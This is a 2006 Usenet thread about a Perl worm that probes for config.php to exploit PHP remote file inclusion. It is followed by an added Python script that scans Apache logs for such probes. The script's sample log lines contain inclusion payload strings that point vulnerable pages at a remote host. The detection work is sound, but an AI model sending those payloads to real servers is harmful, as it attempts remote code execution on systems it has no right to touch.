Re: PHP/Perl/Unix Virus: delete config.php files asap

On Wed, 30 Aug 2006 19:45:54 GMT, Colin McKinnon <colin.thisisnotmysurname@xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx> wrote:
> Ignoramus6539 wrote:
>
>> There were some strange requests to my server asking for config.php
>> file (which I do not have in the requested location).
>
> Nice one Ignoramus6539
>
>> I did some investigation. Seems to be a virus written in perl,
>> exploiting a vulnerability in php code.
>
> Sure looks like it. Is anyone daft enough to include($get_parameter)?

I think that the get parameter was mentioned in the access_log line.

>> I did a locate command on my fedora systems and found config.php in
>> some package called 'squirrelmail'. Which I immediately deleted, even
>> though it was not accessible through the web, just sitting there, but
>> I just do not want it.
>
> Oooh. "Some package called..." sloppy housekeeping!

Yep. Point taken.

> Actually, although Squirrelmail was vulnerable to this kind of attack
> (http://www.sans.org/resources/malwarefaq/squirrelmail.php?portal=750dd8d47b2e376b3699d19913a177c2,
> http://www.idefense.com/intelligence/vulnerabilities/display.php?id=191)
> the developers are relatively good about releasing fixes.
>
> Your attacker seems to be looking for phpListPro
> (http://www.frsirt.com/english/advisories/2006/1325).
>
> Usually script kiddies don't look to see what you're running before
> unleashing all their dogs on your servers.

Absolutely. They probably googled for some keywords on phpListPro and
found them under /algebra/about/history/ directory.

>> My main question is, just what package or program owns config.php that
>> is vulnerable. It is a generic file name, so I would not be so quick
>> to suspect squirrelmail.
>
> Next time try Google first :) and give us a URL for the code.

Well, I thought that the URLs might disappear soon. If you would like
me to place code on my own webpage, I will be glad to do so.

i
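The thread turns on two observations: the worm probes for config.php, and the access_log line carries a GET parameter that the vulnerable include() would follow. The script below is an added example, not code from either poster; it scans Apache combined-format log lines and flags requests in which any query parameter value is itself a remote URL, which is the pattern an include($get_parameter) remote-file-inclusion probe leaves behind. The log lines, the IP addresses, the parameter name `inc` and the path are constructed for the example and are not taken from the thread or from any real advisory.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" log format. Group names are this example's own.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# A parameter value that starts with one of these is something include()
# could fetch over the network when allow_url_fopen/allow_url_include is on.
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def parse_line(line):
    """Split one combined-format line into fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def rfi_indicators(target):
    """Return (path, [(param, value), ...]) for query values that are remote URLs."""
    parts = urlsplit(target)
    hits = [
        (key, value)
        for key, value in parse_qsl(parts.query, keep_blank_values=True)
        if value.lower().startswith(REMOTE_SCHEMES)
    ]
    return parts.path, hits


def scan(lines):
    """Return one finding per request whose query string carries a remote URL."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path, hits = rfi_indicators(rec["target"])
        if hits:
            findings.append({
                "ip": rec["ip"],
                "path": path,
                "status": rec["status"],
                "params": hits,
                # The worm in the thread was after config.php specifically;
                # note that separately so a triager can sort probes by target.
                "config_php": path.endswith("config.php"),
            })
    return findings


# Constructed sample log lines (hypothetical addresses from documentation ranges).
SAMPLE_LOG = [
    '203.0.113.7 - - [30/Aug/2006:19:40:01 +0000] "GET /algebra/about/history/config.php?inc=http://198.51.100.9/x.txt? HTTP/1.1" 404 292 "-" "libwww-perl/5.805"',
    '192.0.2.44 - - [30/Aug/2006:19:40:03 +0000] "GET /webmail/config.php HTTP/1.0" 403 210 "-" "Mozilla/5.0"',
    '192.0.2.45 - - [30/Aug/2006:19:40:05 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [30/Aug/2006:19:40:07 +0000] "GET /forum/index.php?include=https://198.51.100.9/y.txt HTTP/1.1" 200 1024 "-" "libwww-perl/5.805"',
]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        flag = "config.php probe" if f["config_php"] else "other RFI pattern"
        print(f'{f["ip"]} {f["path"]} status={f["status"]} {flag} params={f["params"]}')
```

A 404 on such a request (as in the first sample line, matching the thread's "which I do not have in the requested location") is a failed probe; a 200 on the same pattern against a path that does exist is the line worth investigating first, since it means a script accepted the parameter.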
